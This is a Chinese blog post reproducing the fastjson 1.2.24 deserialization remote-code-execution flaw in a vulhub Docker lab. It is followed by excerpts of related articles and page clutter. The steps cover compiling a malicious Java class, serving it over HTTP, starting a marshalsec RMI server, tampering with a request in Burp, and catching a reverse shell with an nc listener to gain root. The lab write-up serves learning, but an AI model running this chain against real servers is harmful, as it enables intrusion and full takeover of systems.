fastjson 1.2.24-rce漏洞复现

fastjson 1.2.24-rce漏洞复现详解
原创 于 2025-08-06 14:44:43 发布 · 497 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#python #java

一:1.2.24-rce漏洞原理:反序列化漏洞,导致任意命令执行漏洞。

二:前置环境:

        1:kali虚拟机,安装好docker ,进入fastjson 文件中,进行安装靶场docker-compose up -d。

        2:主机有java 1.8版本的,javac python环境。

        3:虚拟机和主机可以相互ping通。

三:实验步骤:

        1: 进到docker/vulhub-master/fastjson/1.2.24-rce 中 下载镜像 docker-compose up -d  ,docker  ps 查看端口开放情况。

        web页面 虚拟机IP+端口 查看json格式输出

2:在主机创建shell.java文件。。

3:在cmd中执行 java shell.java ,会生成shell.class 文件

4:在主机开启python 远程操控。

5:利用marshalsec工具(需要maven环境编译),或者直接下载marshalsec-0.0.3-SNAPSHOT-all.jar 链接: https://pan.baidu.com/s/1pDaDDKWD1VmTAmlnQMB-6Q?pwd=rv7u 提取码: rv7u

7:在marshalse 文件中 打开cmd  输入 java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://ip:8888/#TouchFile 2335(启动RMI服务器,监听2335端口,远程执行shell.class) 

(这里注意一点,和python 远程执行的端口是一致的)

8:抓包Burp 抓取web页面的包。

9:将抓到的包发送到重放器里,进行修改POST 提交内容(注意IP要修改正确

10:利用NC工具, 实现nc  -lvvp 12345 监听

11:发送包,实现监听。

12:成功获得root权限,执行ls 

shellQ1
关注
CVE-2017-18349靶场复现Fastjson1.2.24-RCE
zjxxxy的博客
03-15 371
CVE-2017-18349靶场复现Fastjson1.2.24-RCE
Fastjson1.2.24-RCE 漏洞复现(CVE-2017-18349)
oiadkt的博客
04-12 1757
Fastjson1.2.24-RCE 漏洞复现(CVE-2017-18349)
CVE与重要漏洞复现Fastjson1.2.24-RCE漏洞复现
没有网络安全就没有国家安全
03-17 1674
CVE与重要漏洞复现Fastjson1.2.24-RCE漏洞复现
Fastjson反序列化漏洞(1.2.24 RCE)
m0_61506558的博客
09-13 4369
Fastjson是一个JSON工具库,它的作用就是把java对象转换为json形式,也可以用来将json转换为java对象。@type引入这个功能的目的是在序列化的时候防止子类中包含接口或抽象类的时候,类型丢失,这样我们在反序列化的时候就不需要再指定类名。
fastjson 1.2.24 反序列化 RCE 漏洞复现
m0_63299551的博客
06-27 753
具体可以参考这篇文章FastJson的介绍与使用(一)_maven fastjson-优快云博客fastjson最主要的功能就是可以将Java对象和json之间来回转化,而这个漏洞出现的原因就是在反序列化的过程中。
Fastjson 1.2.24 反序列化漏洞复现
huangyongkang666的博客
04-15 3896
fastjson 1.2.24 反序列化漏洞复现 1.漏洞介绍 FastjsonEngine是其中的一个JSON处理引擎。Fastjson是其中的一个基于Java的JSON解析器/生成器。 Pippo 1.11.0版本中的FastjsonEngine所使用的Fastjson 1.2.25之前版本的parseObject存在安全漏洞。利用fastjson autotype在处理json对象时,未对@type字段进行安全的安全性验证,攻击者可以传入危险类,并调用危险类连接远程RMI主机,通过其中的恶意类执行代码
fastjson1.2.24-RCE漏洞复现
three_1996的博客
03-15 2150
Fastjison在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链,造成远程代码执行。
Fastjson 漏洞复现1.2.24-rce
人们并不感谢罗辑
08-22 2114
fastjson是阿里巴巴开源的一个json解析库,能将json对象和json字符串进行序列化和反序列化操作。autotype功能是是漏洞的关键,autotype允许用户通过@type字段来选择具体的类进行反序列化。如果用户没有对反序列化的类进行严格限制,攻击者可以构造恶意的json字符串来触发这个漏洞
网络安全--Fastjson1.2.24-RCE漏洞
weixin_46066254的博客
12-04 808
fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,autoType标注了类对应的原始类型,方便在反序列化的时候定位到具体类型,fastjson在对JSON字符串进行反序列化的时候,就会读取@type到内容,试图把JSON内容反序列化成这个对象,并且会调用这个类的setter方法。因为有了autoType功能,那么fastjson在对JSON字符串进行反序列化的时候,就会读取@type到内容,试图把JSON内容反序列化成这个对象,并且会调用这个类的setter方法。
Fastjson1.2.24-RCE (CVE-2017-18349)
aetlypdlg_ys的博客
05-12 1087
fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。即fastjson的主要功能就是将Java Bean序列化成JSON字符串,这样得到字符串之后就可以通过数据库等方式进行持久化了。阿里巴巴公司开源Java开发组件Fastjson存在反序列化漏洞(CNVD-2022-40233)。
fastjson-1.2.24
04-24
fastjson用于将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。
fastjson 1.2.24漏洞复现
qq_18831583的博客
01-13 1023
fastjson 1.2.24漏洞复现
Fastjson 1.2.24反序列化漏洞复现
m0_54899775的博客
01-16 4748
Fastjson 1.2.24反序列化漏洞复现 创建文件,反弹shell
【超详细】Fastjson1.2.24反序列化漏洞复现
SuPejkj的博客
10-20 3641
0x01 前言 Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。 Fastjson 可以操作任何 Java 对象,即使是一些预先存在的没有源码的对象。 Fastjson 特性: 提供服务器端、安卓客户端两种解析工具,性能表现较好。 提供了 toJSONString() 和 parseObject() 方法来将 Java 对象与 JSON 相互转换。调用toJSONString方 法即可将对象转换成 JSON 字符.
漏洞复现-fastjson1.2.24-RCE
jazzz98的博客
06-27 550
(4)安装完成好后,新建一个java脚本,命名为TouchFile.java,这个文件的作用大致就是使用java创建一个文件,如下为其所有代码,本意为在靶场的tmp目录下创建一个名为。还有一个比较重要的问题就是,攻击思路为:使用Ubuntu的java加载一个调用恶意文件的环境,再使用该环境远程加载一个恶意类,达到借刀进行命令执行的效果。(3)由于我的环境已经安装好恶意调用java的RMI服务,因此这里仅提供以下编译环境的命令,编译成功会出现绿色的"
fastJson1.2.24漏洞复现
@起风了的博客
05-06 860
背景 fastJson1.2.25版本之前的AutoType 是默认开启的,在1.2.25版本之后就是默认关闭的。 而作怪的就是这个AutoType 恶意类 public class Attack { public Attack() { try { //打开本地计算器 String commands = "calc.exe"; Process pc = Runtime.getRuntime().exec(com
Fastjson 1.2.24 命令执行漏洞复现-JNDI简单实现反弹shell
03-08 3590
Fastjson 1.2.24 命令执行漏洞复现-JNDI简单实现反弹shell,不拖泥带水,最简单的办法实现反弹shell与命令执行。
CVE重要漏洞复现-Fastjson1.2.24-RCE漏洞
最新发布
zj2084的博客
04-14 1019
fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,也可以从JSON字符串反序列化到JavaBean。即fastjson的主要功能就是将Java Bean序列化成JSON字符串,这样得到字符串之后就可以通过数据库等方式进行持久化了阿里巴巴公司开源Java开发组件Fastjson存在反序列化漏洞(CNVD-2022-40233)。攻击者可利用该漏洞实施任意文件写入、服务端请求伪造等攻击行为,造成服务器权限被窃取、敏感信息泄漏等严重影响。
fastjson 1.2.24 反序列化 RCE 漏洞复现(CVE-2017-18349)
一个top2本科学渣的救赎之路
04-23 7067
fastjson 1.2.24 反序列化导致任意命令执行漏洞,可获得服务器root权限
fastjson1.2.24rce漏洞复现
06-06
fastjson1.2.24rce漏洞是一种Java反序列化漏洞,攻击者可以通过构造恶意的JSON数据包,触发目标服务器上的fastjson库反序列化漏洞,从而实现远程代码执行。该漏洞存在于fastjson 1.2.24及之前版本中,已经被修复。如果您使用的是fastjson 1.2.24及之前版本,请及时升级到最新版本以避免被攻击。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值